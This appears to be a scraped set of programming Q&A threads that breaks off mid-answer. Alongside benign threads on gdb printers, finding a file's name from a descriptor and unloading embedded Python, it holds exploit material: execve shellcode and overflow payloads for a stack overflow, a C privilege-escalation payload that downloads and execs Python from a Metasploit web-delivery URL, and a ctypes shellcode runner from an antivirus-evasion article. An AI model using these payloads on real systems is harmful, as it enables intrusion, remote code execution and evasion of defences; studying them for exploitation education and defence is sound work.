Why is my stack buffer overflow exploit not working?

Why is my stack buffer overflow exploit not working? - python

So I have a really simple stackoverflow:
#include <stdio.h>
int main(int argc, char *argv[]) {
char buf[256];
memcpy(buf, argv[1],strlen(argv[1]));
printf(buf);
}
I'm trying to overflow with this code:
$(python -c "print '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80' + 'A'*237 + 'c8f4ffbf'.decode('hex')")
When I overflow the stack, I successfully overwrite EIP with my wanted address but then nothing happens. It doesn't execute my shellcode.
Does anyone see the problem? Note: My python may be wrong.
UPDATE
What I don't understand is why my code is not executing. For instance if I point eip to nops, the nops never get executed. Like so,
$(python -c "print '\x90'*50 + 'A'*210 + '\xc8\xf4\xff\xbf'")
UPDATE
Could someone be kind enough to exploit this overflow yourself on linux
x86 and post the results?
UPDATE
Nevermind ya'll, I got it working. Thanks for all your help.
UPDATE
Well, I thought I did. I did get a shell, but now I'm trying again and I'm having problems.
All Im doing is overflowing the stack at the beginning and pointing my shellcode there.
Like so,
r $(python -c 'print "A"*260 + "\xcc\xf5\xff\xbf"')
This should point to the A's. Now what I dont understand is why my address at the end gets changed in gdb.
This is what gdb gives me,
Program received signal SIGTRAP, Trace/breakpoint trap.
0xbffff5cd in ?? ()
The \xcc gets changed to \xcd. Could this have something to do with the error I get with gdb?
When I fill that address with "B"'s for instance it resolves fine with \x42\x42\x42\x42. So what gives?
Any help would be appreciated.
Also, I'm compiling with the following options:
gcc -fno-stack-protector -z execstack -mpreferred-stack-boundary=2 -o so so.c
It's really odd because any other address works except the one I need.
UPDATE
I can successfully spawn a shell with the following in gdb,
$(python -c "print '\x90'*37 +'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80' + 'A'*200 + '\xc8\xf4\xff\xbf'")
But I don't understand why this works sometimes and doesn't work other times. Sometimes my overwritten eip is changed by gdb. Does anyone know what I am missing? Also, I can only spwan a shell in gdb and not in the normal process. And on top of that, I can only seem to start a shell once in gdb and then gdb stops working.
For instance, now when I run the following I get this in gdb...
Starting program: /root/so $(python -c 'print "A"*260 + "\xc8\xf4\xff\xbf"')
Program received signal SIGSEGV, Segmentation fault.
0xbffff5cc in ?? ()
This seems to be caused by execstack be turned on.
UPDATE
Yeah, for some reason I'm getting different results but the exploit is working now. So thank you everyone for your help. If anyone can explain the results I received above, I'm all ears. Thanks.

There are several protections, for the attack straight from the
compiler. For example your stack may not be executable.
readelf -l <filename>
if your output contains something like this:
GNU_STACK 0x000000 0x00000000 0x00000000 0x00000 0x00000 RW 0x4
this means that you can only read and write on the stack ( so you should "return to libc" to spawn your shell).
Also there could be a canary protection, meaning there is a part of the memory between your variables and the instruction pointer that contains a phrase that is checked for integrity and if it is overwritten by your string the program will exit.
if your are trying this on your own program consider removing some of the protections with gcc commands:
gcc -z execstack
Also a note on your assembly, you usually include nops before your shell code, so you don't have to target the exact address that your shell code is starting.
$(python -c "print '\x90'*37 +'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80' + 'A'*200 + '\xc8\xf4\xff\xbf'")
Note that in the address that should be placed inside the instruction pointer
you can modify the last hex digits to point somewhere inside your nops and not
necessarily at the beginning of your buffer.
Of course gdb should become your best friend if you are trying something
like that.
Hope this helps.

This isn't going to work too well [as written]. However, it is possible, so read on ...
It helps to know what the actual stack layout is when the main function is called. It's a bit more complicated than most people realize.
Assuming a POSIX OS (e.g. linux), the kernel will set the stack pointer at a fixed address.
The kernel does the following:
It calculates how much space is needed for the environment variable strings (i.e. strlen("HOME=/home/me") + 1 for all environment variables and "pushes" these strings onto the stack in a downward [towards lower memory] direction. It then calculates how many there were (e.g. envcount) and creates an char *envp[envcount + 1] on the stack and fills in the envp values with pointers to the given strings. It null terminates this envp
A similar process is done for the argv strings.
Then, the kernel loads the ELF interpreter. The kernel starts the process with the starting address of the ELF interpreter. The ELF interpreter [eventually] invokes the "start" function (e.g. _start from crt0.o) which does some init and then calls main(argc,argv,envp)
This is [sort of] what the stack looks like when main gets called:
"HOME=/home/me"
"LOGNAME=me"
"SHELL=/bin/sh"
// alignment pad ...
char *envp[4] = {
// address of "HOME" string
// address of "LOGNAME" string
// address of "SHELL" string
NULL
};
// string for argv[0] ...
// string for argv[1] ...
// ...
char *argv[] = {
// pointer to argument string 0
// pointer to argument string 1
// pointer to argument string 2
NULL
}
// possibly more stuff put in by ELF interpreter ...
// possibly more stuff put in by _start function ...
On an x86, the argc, argv, and envp pointer values are put into the first three argument registers of the x86 ABI.
Here's the problem [problems, plural, actually] ...
By the time all this is done, you have little to no idea what the address of the shell code is. So, any code you write must be RIP-relative addressing and [probably] built with -fPIC.
And, the resultant code can't have a zero byte in the middle because this is being conveyed [by the kernel] as an EOS terminated string. So, a string that has a zero (e.g. <byte0>,<byte1>,<byte2>,0x00,<byte5>,<byte6>,...) would only transfer the first three bytes and not the entire shell code program.
Nor do you have a good idea as to what the stack pointer value is.
Also, you need to find the memory word on the stack that has the return address in it (i.e. this is what the start function's call main asm instruction pushes).
This word containing the return address must be set to the address of the shell code. But, it doesn't always have a fixed offset relative to a main stack frame variable (e.g. buf). So, you can't predict what word on the stack to modify to get the "return to shellcode" effect.
Also, on x86 architectures, there is special mitigation hardware. For example, a page can be marked NX [no execute]. This is usually done for certain segments, such as the stack. If the RIP is changed to point to the stack, the hardware will fault out.
Here's the [easy] solution ...
gcc has some intrinsic functions that can help: __builtin_return_address, __builtin_frame_address.
So, get the value of the real return address from the intrinsic [call this retadr]. Get the address of the stack frame [call this fp].
Starting from fp and incrementing (by sizeof(void*)) toward higher memory, find a word that matches retadr. This memory location is the one you want to modify to point to the shell code. It will probably be at offset 0 or 8
So, then do: *fp = argv[1] and return.
Note, extra steps may be necessary because if the stack has the NX bit set, the string pointed to by argv[1] is on the stack as mentioned above.
Here is some example code that works:
#define _GNU_SOURCE
#include <stdio.h>
#include <unistd.h>
#include <sys/syscall.h>
void
shellcode(void)
{
static char buf[] = "shellcode: hello\n";
char *cp;
for (cp = buf; *cp != 0; ++cp);
// NOTE: in real shell code, we couldn't rely on using this function, so
// these would need to be the CPP macro versions: _syscall3 and _syscall2
// respectively or the syscall function would need to be _statically_
// linked in
syscall(SYS_write,1,buf,cp - buf);
syscall(SYS_exit,0);
}
int
main(int argc,char **argv)
{
void *retadr = __builtin_return_address(0);
void **fp = __builtin_frame_address(0);
int iter;
printf("retadr=%p\n",retadr);
printf("fp=%p\n",fp);
// NOTE: for your example, replace:
// *fp = (void *) shellcode;
// with:
// *fp = (void *) argv[1]
for (iter = 20; iter > 0; --iter, fp += 1) {
printf("fp=%p %p\n",fp,*fp);
if (*fp == retadr) {
*fp = (void *) shellcode;
break;
}
}
if (iter <= 0)
printf("main: no match\n");
return 0;
}

I was having similar problems when trying to perform a stack buffer overflow. I found that my return address in GDB was different than that in a normal process. What I did was add the following:
unsigned long printesp(void){
__asm__("movl %esp,%eax");
}
And called it at the end of main right before Return to get an idea where the stack was. From there I just played with that value subtracting 4 from the printed ESP until it worked.

Related

How do I apply the printers.py modification? (Linux OS)

I checked the core file because the process(c++ lang) running on Linux died, and the contents of the core file
[Corefile]
File "/usr/lib64/../share/gdb/python/libstdcxx/v6/printers.py", line 558, in to_string
return self.val['_M_dataplus']['_M_p'].lazy_string (length = len)
RuntimeError: Cannot access memory at address 0x3b444e45203b290f
I think that there was a problem with class StdStringPrinter at printers.py.
So I looked up a text that explained the problem I was looking for on this site , modified printers.py, and created a .gdbinit on my home path and wrote the content.
How to enable gdb pretty printing for C++ STL objects in Eclipse CDT?
Eclipse/CDT Pretty Print Errors
But this method is a little different from the one I'm looking for because it's done in Eclipse.
my gdb version is 7.6.1-94.el7
[printer.py]
class StdStringPrinter:
"Print a std::basic_string of some kind"
def __init__(self, typename, val):
self.val = val
def to_string(self):
# Make sure &string works, too.
type = self.val.type
if type.code == gdb.TYPE_CODE_REF:
type = type.target ()
sys.stdout.write("HelloWorld") // TEST Code
# Calculate the length of the string so that to_string returns
# the string according to length, not according to first null
# encountered.
ptr = self.val ['_M_dataplus']['_M_p']
realtype = type.unqualified ().strip_typedefs ()
reptype = gdb.lookup_type (str (realtype) + '::_Rep').pointer ()
header = ptr.cast(reptype) - 1
len = header.dereference ()['_M_length']
if hasattr(ptr, "lazy_string"):
return ptr.lazy_string (length = len)
return ptr.string (length = len)
def display_hint (self):
return 'string'
[.gdbinit]
python
import sys
sys.path.insert(0, '/home/Hello/gcc-4.8.2/python')
from libstdcxx.v6.printers import register_libstdcxx_printers
register_libstdcxx_printers (None)
end
My question is to modify printers.py, write gdbinit, and then re-compile the process to test whether it has been applied as modified.
How can I print my modified TEST code at Linux Terminal?

I think that there was a problem with class StdStringPrinter at printers.py
I think you are fundamentally confused, and your problem has nothing at all to do with printers.py.
You didn't show us your GDB session, but it appears that you have tried to print some variable of type std::string, and when you did so, GDB produced this error:
RuntimeError: Cannot access memory at address 0x3b444e45203b290f
What this error means is that GDB could not read value from memory location 0x3b444e45203b290f. On an x86_64 system, such a location indeed can not be readable, because that address does not have canonical form.
Conclusion: the pointer that you followed (likely a pointer to std::string in your program) does not actually point to std::string. "Fixing" the printers.py is not going to solve that problem.
This conclusion is corroborated by
the process(c++ lang) running on Linux died,
Finally, the pointer that you gave GDB to print: 0x3b444e45203b290f looks suspiciously like an ASCII string. Decoding it, we have: \xf); END;. So it's very likely that your program scribbled ); END; over a location where the pointer was supposed to be, and that you have a buffer overflow of some sort.
P.S.
My question is to modify printers.py, write gdbinit, and then re-compile the process to test whether it has been applied as modified.
This question also shows fundamental misunderstanding of how printers.py works. It has nothing to do with your program (it's loaded into GDB).
Recompiling anything (either your program or GDB) is not required. Simply restarting GDB should be all that's neccessary for it to pick up the new version of printers.py (not that that would fix anything).

How can I get the new name of a renamed file given its file descriptor/object? [duplicate]

Is it possible to get the filename of a file descriptor (Linux) in C?

You can use readlink on /proc/self/fd/NNN where NNN is the file descriptor. This will give you the name of the file as it was when it was opened — however, if the file was moved or deleted since then, it may no longer be accurate (although Linux can track renames in some cases). To verify, stat the filename given and fstat the fd you have, and make sure st_dev and st_ino are the same.
Of course, not all file descriptors refer to files, and for those you'll see some odd text strings, such as pipe:[1538488]. Since all of the real filenames will be absolute paths, you can determine which these are easily enough. Further, as others have noted, files can have multiple hardlinks pointing to them - this will only report the one it was opened with. If you want to find all names for a given file, you'll just have to traverse the entire filesystem.

I had this problem on Mac OS X. We don't have a /proc virtual file system, so the accepted solution cannot work.
We do, instead, have a F_GETPATH command for fcntl:
F_GETPATH Get the path of the file descriptor Fildes. The argu-
ment must be a buffer of size MAXPATHLEN or greater.
So to get the file associated to a file descriptor, you can use this snippet:
#include <sys/syslimits.h>
#include <fcntl.h>
char filePath[PATH_MAX];
if (fcntl(fd, F_GETPATH, filePath) != -1)
{
// do something with the file path
}
Since I never remember where MAXPATHLEN is defined, I thought PATH_MAX from syslimits would be fine.

In Windows, with GetFileInformationByHandleEx, passing FileNameInfo, you can retrieve the file name.

As Tyler points out, there's no way to do what you require "directly and reliably", since a given FD may correspond to 0 filenames (in various cases) or > 1 (multiple "hard links" is how the latter situation is generally described). If you do still need the functionality with all the limitations (on speed AND on the possibility of getting 0, 2, ... results rather than 1), here's how you can do it: first, fstat the FD -- this tells you, in the resulting struct stat, what device the file lives on, how many hard links it has, whether it's a special file, etc. This may already answer your question -- e.g. if 0 hard links you will KNOW there is in fact no corresponding filename on disk.
If the stats give you hope, then you have to "walk the tree" of directories on the relevant device until you find all the hard links (or just the first one, if you don't need more than one and any one will do). For that purpose, you use readdir (and opendir &c of course) recursively opening subdirectories until you find in a struct dirent thus received the same inode number you had in the original struct stat (at which time if you want the whole path, rather than just the name, you'll need to walk the chain of directories backwards to reconstruct it).
If this general approach is acceptable, but you need more detailed C code, let us know, it won't be hard to write (though I'd rather not write it if it's useless, i.e. you cannot withstand the inevitably slow performance or the possibility of getting != 1 result for the purposes of your application;-).

Before writing this off as impossible I suggest you look at the source code of the lsof command.
There may be restrictions but lsof seems capable of determining the file descriptor and file name. This information exists in the /proc filesystem so it should be possible to get at from your program.

You can use fstat() to get the file's inode by struct stat. Then, using readdir() you can compare the inode you found with those that exist (struct dirent) in a directory (assuming that you know the directory, otherwise you'll have to search the whole filesystem) and find the corresponding file name.
Nasty?

There is no official API to do this on OpenBSD, though with some very convoluted workarounds, it is still possible with the following code, note you need to link with -lkvm and -lc. The code using FTS to traverse the filesystem is from this answer.
#include <string>
#include <vector>
#include <cstdio>
#include <cstring>
#include <sys/stat.h>
#include <fts.h>
#include <sys/sysctl.h>
#include <kvm.h>
using std::string;
using std::vector;
string pidfd2path(int pid, int fd) {
string path; char errbuf[_POSIX2_LINE_MAX];
static kvm_t *kd = nullptr; kinfo_file *kif = nullptr; int cntp = 0;
kd = kvm_openfiles(nullptr, nullptr, nullptr, KVM_NO_FILES, errbuf); if (!kd) return "";
if ((kif = kvm_getfiles(kd, KERN_FILE_BYPID, pid, sizeof(struct kinfo_file), &cntp))) {
for (int i = 0; i < cntp; i++) {
if (kif[i].fd_fd == fd) {
FTS *file_system = nullptr; FTSENT *child = nullptr; FTSENT *parent = nullptr;
vector<char *> root; char buffer[2]; strcpy(buffer, "/"); root.push_back(buffer);
file_system = fts_open(&root[0], FTS_COMFOLLOW | FTS_NOCHDIR, nullptr);
if (file_system) {
while ((parent = fts_read(file_system))) {
child = fts_children(file_system, 0);
while (child && child->fts_link) {
child = child->fts_link;
if (!S_ISSOCK(child->fts_statp->st_mode)) {
if (child->fts_statp->st_dev == kif[i].va_fsid) {
if (child->fts_statp->st_ino == kif[i].va_fileid) {
path = child->fts_path + string(child->fts_name);
goto finish;
}
}
}
}
}
finish:
fts_close(file_system);
}
}
}
}
kvm_close(kd);
return path;
}
int main(int argc, char **argv) {
if (argc == 3) {
printf("%s\n", pidfd2path((int)strtoul(argv[1], nullptr, 10),
(int)strtoul(argv[2], nullptr, 10)).c_str());
} else {
printf("usage: \"%s\" <pid> <fd>\n", argv[0]);
}
return 0;
}
If the function fails to find the file, (for example, because it no longer exists), it will return an empty string. If the file was moved, in my experience when moving the file to the trash, the new location of the file is returned instead if that location wasn't already searched through by FTS. It'll be slower for filesystems that have more files.
The deeper the search goes in the directory tree of your entire filesystem without finding the file, the more likely you are to have a race condition, though still very unlikely due to how performant this is. I'm aware my OpenBSD solution is C++ and not C. Feel free to change it to C and most of the code logic will be the same. If I have time I'll try to rewrite this in C hopefully soon. Like macOS, this solution gets a hardlink at random (citation needed), for portability with Windows and other platforms which can only get one hard link. You could remove the break in the while loop and return a vector if you want don't care about being cross-platform and want to get all the hard links. DragonFly BSD and NetBSD have the same solution (the exact same code) as the macOS solution on the current question, which I verified manually. If a macOS user wishes to get a path from a file descriptor opened any process, by plugging in a process id, and not be limited to just the calling one, while also getting all hard links potentially, and not being limited to a random one, see this answer. It should be a lot more performant that traversing your entire filesystem, similar to how fast it is on Linux and other solutions that are more straight-forward and to-the-point. FreeBSD users can get what they are looking for in this question, because the OS-level bug mentioned in that question has since been resolved for newer OS versions.
Here's a more generic solution which can only retrieve the path of a file descriptor opened by the calling process, however it should work for most Unix-likes out-of-the-box, with all the same concerns as the former solution in regards to hard links and race conditions, although performs slightly faster due to less if-then, for-loops, etc:
#include <string>
#include <vector>
#include <cstring>
#include <sys/stat.h>
#include <fts.h>
using std::string;
using std::vector;
string fd2path(int fd) {
string path;
FTS *file_system = nullptr; FTSENT *child = nullptr; FTSENT *parent = nullptr;
vector<char *> root; char buffer[2]; strcpy(buffer, "/"); root.push_back(buffer);
file_system = fts_open(&root[0], FTS_COMFOLLOW | FTS_NOCHDIR, nullptr);
if (file_system) {
while ((parent = fts_read(file_system))) {
child = fts_children(file_system, 0);
while (child && child->fts_link) {
child = child->fts_link; struct stat info = { 0 };
if (!S_ISSOCK(child->fts_statp->st_mode)) {
if (!fstat(fd, &info) && !S_ISSOCK(info.st_mode)) {
if (child->fts_statp->st_dev == info.st_dev) {
if (child->fts_statp->st_ino == info.st_ino) {
path = child->fts_path + string(child->fts_name);
goto finish;
}
}
}
}
}
}
finish:
fts_close(file_system);
}
return path;
}
An even quicker solution which is also limited to the calling process, but should be somewhat more performant, you could wrap all your calls to fopen() and open() with a helper function which stores basically whatever C equivalent there is to an std::unordered_map, and pair up the file descriptor with the absolute path version of what is passed to your fopen()/open() wrappers (and the Windows-only equivalents which won't work on UWP like _wopen_s() and all that nonsense to support UTF-8), which can be done with realpath() on Unix-likes, or GetFullPathNameW() (*W for UTF-8 support) on Windows. realpath() will resolve symbolic links (which aren't near as commonly used on Windows), and realpath() / GetFullPathNameW() will convert your existing file you opened from a relative path, if it is one, to an absolute path. With the file descriptor and absolute path stored an a C equivalent to a std::unordered_map (which you likely will have to write yourself using malloc()'d and eventually free()'d int and c-string arrays), this will again, be faster than any other solution that does a dynamic search of your filesystem, but it has a different and unappealing limitation, which is it will not make note of files which were moved around on your filesystem, however at least you can check whether the file was deleted using your own code to test existence, it also won't make note of the file in whether it was replaced since the time you opened it and stored the path to the descriptor in memory, thus giving you outdated results potentially. Let me know if you would like to see a code example of this, though due to files changing location I do not recommend this solution.

Impossible. A file descriptor may have multiple names in the filesystem, or it may have no name at all.
Edit: Assuming you are talking about a plain old POSIX system, without any OS-specific APIs, since you didn't specify an OS.

How to stop URL from being commented out (C)

I've been attempting a privilege escalation exploit on Linux, and it will run whatever file is at /tmp/run as the root user (Linux kernel 2.6 UDEV exploit). I've decided to make my payload in C (for an added challenge). It simply needs to execute a single python command (generated by Metasploit's web delivery module). The issue is, when I enter a URL as a string, the // in http:// will comment out the rest of the URL.
I don't know that much C whatsoever, so I have no idea how to fix this issue. This may seem a bit noob-ish, but I really can't find an answer anywhere.
Current code:
#include <stdio.h>
int main(void) {
system("python -c \"import urllib2; r = urllib2.urlopen('http://0.0.0.0:8080/tmmPIejv70OV'); exec(r.read());\"" <== // in http:// comments out rest of line
return 0;
}
Is there a proper way to fix this?

// does not make a comment inside of a string literal. The use of // in the string is not the problem you posted, instead, you should finish the system function call with closing ).
#include <stdio.h>
int main(void) {
system("python -c \"import urllib2; r = urllib2.urlopen('http://0.0.0.0:8080/tmmPIejv70OV'); exec(r.read());\"");
return 0;
}

Python - C embedded Segmentation fault

I am facing a problem similar to the Py_initialize / Py_Finalize not working twice with numpy .. The basic coding in C:
Py_Initialize();
import_array();
//Call a python function which imports numpy as a module
//Py_Finalize()
The program is in a loop and it gives a seg fault if the python code has numpy as one of the imported module. If I remove numpy, it works fine.
As a temporary work around I tried not to use Py_Finalize(), but that is causing huge memory leaks [ observed as the memory usage from TOP keeps on increasing ]. And I tried but did not understand the suggestion in that link I posted. Can someone please suggest the best way to finalize the call while having imports such as numpy.
Thanks
santhosh.

I recently faced a very similar issue and developed a workaround that works for my purposes, so I thought I would write it here in the hope it might help others.
The problem
I work with some postprocessing pipeline for which I can write a own functor to work on some data passing through the pipeline and I wanted to be able to use Python scripts for some of the operations.
The problem is that the only thing I can control is the functor itself, which gets instantiated and destroyed at times beyond my control. I furthermore have the problem that even if I do not call Py_Finalize the pipeline sometimes crashes once I pass another dataset through the pipeline.
The solution in a Nutshell
For those who don't want to read the whole story and get straight to the point, here's the gist of my solution:
The main idea behind my workaround is not to link against the Python library, but instead load it dynamically using dlopen and then get all the addresses of the required Python functions using dlsym. Once that's done, one can call Py_Initialize() followed by whatever you want to do with Python functions followed by a call to Py_Finalize() once you're done. Then, one can simply unload the Python library. The next time you need to use Python functions, simply repeat the steps above and Bob's your uncle.
However, if you are importing NumPy at any point between Py_Initialize and Py_Finalize, you will also need to look for all the currently loaded libraries in your program and manually unload those using dlclose.
Detailed workaround
Loading instead of linking Python
The main idea as I mentioned above is not to link against the Python library. Instead, what we will do is load the Python library dynamically using dlopen():
#include
...
void* pHandle = dlopen("/path/to/library/libpython2.7.so", RTLD_NOW | RTLD_GLOBAL);
The code above loads the Python shared library and returns a handle to it (the return type is an obscure pointer type, thus the void*). The second argument (RTLD_NOW | RTLD_GLOBAL) is there to make sure that the symbols are properly imported into the current application's scope.
Once we have a pointer to the handle of the loaded library, we can search that library for the functions it exports using the dlsym function:
#include <dlfcn.h>
...
// Typedef named 'void_func_t' which holds a pointer to a function with
// no arguments with no return type
typedef void (*void_func_t)(void);
void_func_t MyPy_Initialize = dlsym(pHandle, "Py_Initialize");
The dlsym function takes two parameters: a pointer to the handle of the library that we obtained previously and the name of the function we are looking for (in this case, Py_Initialize). Once we have the address of the function we want, we can create a function pointer and initialize it to that address. To actually call the Py_Initialize function, one would then simply write:
MyPy_Initialize();
For all the other functions provided by the Python C-API, one can just add calls to dlsym and initialize function pointers to its return value and then use those function pointers instead of the Python functions. One simply has to know the parameter and return value of the Python function in order to create the correct type of function pointer.
Once we are finished with the Python functions and call Py_Finalize using a procedure similar to the one for Py_Initialize one can unload the Python dynamic library in the following way:
dlclose(pHandle);
pHandle = NULL;
Manually unloading NumPy libraries
Unfortunately, this does not solve the segmentation fault problems that occur when importing NumPy. The problems comes from the fact that NumPy also loads some libraries using dlopen (or something equivalent) and those do not get unloaded them when you call Py_Finalize. Indeed, if you list all the loaded libraries within your program, you will notice that after closing the Python environment with Py_Finalize, followed by a call to dlclose, some NumPy libraries will remain loaded in memory.
The second part of the solution requires to list all the Python libraries that remain in memory after the call dlclose(pHandle);. Then, for each of those libraries, grab a handle to them and then call dlcloseon them. After that, they should get unloaded automatically by the operating system.
Fortunately, there are functions under both Windows and Linux (sorry MacOS, couldn't find anything that would work in your case...):
- Linux: dl_iterate_phdr
- Windows: EnumProcessModules in conjunction with OpenProcess and GetModuleFileNameEx
Linux
This is rather straight forward once you read the documentation about dl_iterate_phdr:
#include <link.h>
#include <string>
#include <vector>
// global variables are evil!!! but this is just for demonstration purposes...
std::vector<std::string> loaded_libraries;
// callback function that gets called for every loaded libraries that
// dl_iterate_phdr finds
int dl_list_callback(struct dl_phdr_info *info, size_t, void *)
{
loaded_libraries.push_back(info->dlpi_name);
return 0;
}
int main()
{
...
loaded_libraries.clear();
dl_iterate_phdr(dl_list_callback, NULL);
// loaded_libraries now contains a list of all dynamic libraries loaded
// in your program
....
}
Basically, the function dl_iterate_phdr cycles through all the loaded libraries (in the reverse order they were loaded) until either the callback returns something other than 0 or it reaches the end of the list. To save the list, the callback simply adds each element to a global std::vector (one should obviously avoid global variables and use a class for example).
Windows
Under Windows, things get a little more complicated, but still manageable:
#include <windows.h>
#include <psapi.h>
std::vector<std::string> list_loaded_libraries()
{
std::vector<std::string> m_asDllList;
HANDLE hProcess(OpenProcess(PROCESS_QUERY_INFORMATION
| PROCESS_VM_READ,
FALSE, GetCurrentProcessId()));
if (hProcess) {
HMODULE hMods[1024];
DWORD cbNeeded;
if (EnumProcessModules(hProcess, hMods, sizeof(hMods), &cbNeeded)) {
const DWORD SIZE(cbNeeded / sizeof(HMODULE));
for (DWORD i(0); i < SIZE; ++i) {
TCHAR szModName[MAX_PATH];
// Get the full path to the module file.
if (GetModuleFileNameEx(hProcess,
hMods[i],
szModName,
sizeof(szModName) / sizeof(TCHAR))) {
#ifdef UNICODE
std::wstring wStr(szModName);
std::string tModuleName(wStr.begin(), wStr.end());
#else
std::string tModuleName(szModName);
#endif /* UNICODE */
if (tModuleName.substr(tModuleName.size()-3) == "dll") {
m_asDllList.push_back(tModuleName);
}
}
}
}
CloseHandle(hProcess);
}
return m_asDllList;
}
The code in this case is slightly longer than for the Linux case, but the main idea is the same: list all the loaded libraries and save them into a std::vector. Don't forget to also link your program to the Psapi.lib!
Manual unloading
Now that we can list all the loaded libraries, all you need to do is find among those the ones that come from loading NumPy, grab a handle to them and then call dlclose on that handle. The code below will work on both Windows and Linux, provided that you use the dlfcn-win32 library.
#ifdef WIN32
# include <windows.h>
# include <psapi.h>
# include "dlfcn_win32.h"
#else
# include <dlfcn.h>
# include <link.h> // for dl_iterate_phdr
#endif /* WIN32 */
#include <string>
#include <vector>
// Function that list all loaded libraries (not implemented here)
std::vector<std::string> list_loaded_libraries();
int main()
{
// do some preprocessing stuff...
// store the list of loaded libraries now
// any libraries that get added to the list from now on must be Python
// libraries
std::vector<std::string> loaded_libraries(list_loaded_libraries());
std::size_t start_idx(loaded_libraries.size());
void* pHandle = dlopen("/path/to/library/libpython2.7.so", RTLD_NOW | RTLD_GLOBAL);
// Not implemented here: get the addresses of the Python function you need
MyPy_Initialize(); // Needs to be defined somewhere above!
MyPyRun_SimpleString("import numpy"); // Needs to be defined somewhere above!
// ...
MyPyFinalize(); // Needs to be defined somewhere above!
// Now list the loaded libraries again and start manually unloading them
// starting from the end
loaded_libraries = list_loaded_libraries();
// NB: this below assumes that start_idx != 0, which should always hold true
for(std::size_t i(loaded_libraries.size()-1) ; i >= start_idx ; --i) {
void* pHandle = dlopen(loaded_libraries[i].c_str(),
#ifdef WIN32
RTLD_NOW // no support for RTLD_NOLOAD
#else
RTLD_NOW|RTLD_NOLOAD
#endif /* WIN32 */
);
if (pHandle) {
const unsigned int Nmax(50); // Avoid getting stuck in an infinite loop
for (unsigned int j(0) ; j < Nmax && !dlclose(pHandle) ; ++j);
}
}
}
Final words
The examples shown here capture the basic ideas behind my solution, but can certainly be improved to avoid global variables and facilitate ease of use (for example, I wrote a singleton class that handles the automatic initialization of all the function pointers after loading the Python library).
I hope this can be useful to someone in the future.
References
dl_iterate_phdr: https://linux.die.net/man/3/dl_iterate_phdr
PsAPI library: https://msdn.microsoft.com/en-us/library/windows/desktop/ms684894(v=vs.85).aspx
OpenProcess: https://msdn.microsoft.com/en-us/library/windows/desktop/ms684320(v=vs.85).aspx
EnumProcess: https://msdn.microsoft.com/en-us/library/windows/desktop/ms682629(v=vs.85).aspx
GetModuleFileNameEx: https://msdn.microsoft.com/en-us/library/windows/desktop/ms683198(v=vs.85).aspx
dlfcn-win32 library: library: https://github.com/dlfcn-win32/dlfcn-win32

I'm not quite sure how you don't seem to understand the solution posted in Py_initialize / Py_Finalize not working twice with numpy. The solution posted is quite simple: call Py_Initialize and Py_Finalize only once for each time your program executes. Do not call them every time you run the loop.
I assume that your program, when it starts, runs some initialization commands (which are only run once). Call Py_Initialize there. Never call it again. Also, I assume that when your program terminates, it has some code to tear down things, dump log files, etc. Call Py_Finalize there. Py_Initialize and Py_Finalize are not intended to help you manage memory in the Python interpreter. Do not use them for that, as they cause your program to crash. Instead, use Python's own functions to get rid of objects you don't want to keep.
If you really MUST create a new environment every time you run your code, you can use Py_NewInterpreter and to create a sub-interpreter and Py_EndInterpreter to destroy that sub-interpreter later. They're documented near the bottom of the Python C API page. This works similarly to having a new interpreter, except that modules are not re-initialized each time a sub-interpreter starts.

ctypes: Cast string to function?

I was reading the article Tips for Evading Anti-Virus During Pen Testing and was surprised by given Python program:
from ctypes import *
shellcode = '\xfc\xe8\x89\x00\x00....'
memorywithshell = create_string_buffer(shellcode, len(shellcode))
shell = cast(memorywithshell, CFUNCTYPE(c_void_p))
shell()
The shellcode is shortened. Can someone explain what is going on? I'm familiar with both Python and C, I've tried read on the ctypes module, but there are two main questions left:
What is stored in shellcode?
I know this has something to do with C (in the article it is an shellcode from Metasploit and a different notation for ASCII was chosen), but I cannot identify whether if it's C source (probably not) or originates from some sort of compilation (which?).
Depending on the first question, what's the magic happening during the cast?

Have a look at this shellcode, I toke it from here (it pops up a MessageBoxA):
#include <stdio.h>
typedef void (* function_t)(void);
unsigned char shellcode[] =
"\xFC\x33\xD2\xB2\x30\x64\xFF\x32\x5A\x8B"
"\x52\x0C\x8B\x52\x14\x8B\x72\x28\x33\xC9"
"\xB1\x18\x33\xFF\x33\xC0\xAC\x3C\x61\x7C"
"\x02\x2C\x20\xC1\xCF\x0D\x03\xF8\xE2\xF0"
"\x81\xFF\x5B\xBC\x4A\x6A\x8B\x5A\x10\x8B"
"\x12\x75\xDA\x8B\x53\x3C\x03\xD3\xFF\x72"
"\x34\x8B\x52\x78\x03\xD3\x8B\x72\x20\x03"
"\xF3\x33\xC9\x41\xAD\x03\xC3\x81\x38\x47"
"\x65\x74\x50\x75\xF4\x81\x78\x04\x72\x6F"
"\x63\x41\x75\xEB\x81\x78\x08\x64\x64\x72"
"\x65\x75\xE2\x49\x8B\x72\x24\x03\xF3\x66"
"\x8B\x0C\x4E\x8B\x72\x1C\x03\xF3\x8B\x14"
"\x8E\x03\xD3\x52\x33\xFF\x57\x68\x61\x72"
"\x79\x41\x68\x4C\x69\x62\x72\x68\x4C\x6F"
"\x61\x64\x54\x53\xFF\xD2\x68\x33\x32\x01"
"\x01\x66\x89\x7C\x24\x02\x68\x75\x73\x65"
"\x72\x54\xFF\xD0\x68\x6F\x78\x41\x01\x8B"
"\xDF\x88\x5C\x24\x03\x68\x61\x67\x65\x42"
"\x68\x4D\x65\x73\x73\x54\x50\xFF\x54\x24"
"\x2C\x57\x68\x4F\x5F\x6F\x21\x8B\xDC\x57"
"\x53\x53\x57\xFF\xD0\x68\x65\x73\x73\x01"
"\x8B\xDF\x88\x5C\x24\x03\x68\x50\x72\x6F"
"\x63\x68\x45\x78\x69\x74\x54\xFF\x74\x24"
"\x40\xFF\x54\x24\x40\x57\xFF\xD0";
void real_function(void) {
puts("I'm here");
}
int main(int argc, char **argv)
{
function_t function = (function_t) &shellcode[0];
real_function();
function();
return 0;
}
Compile it an hook it under any debugger, I'll use gdb:
> gcc shellcode.c -o shellcode
> gdb -q shellcode.exe
Reading symbols from shellcode.exe...done.
(gdb)
>
Disassemble the main function to see that different between calling real_function and function:
(gdb) disassemble main
Dump of assembler code for function main:
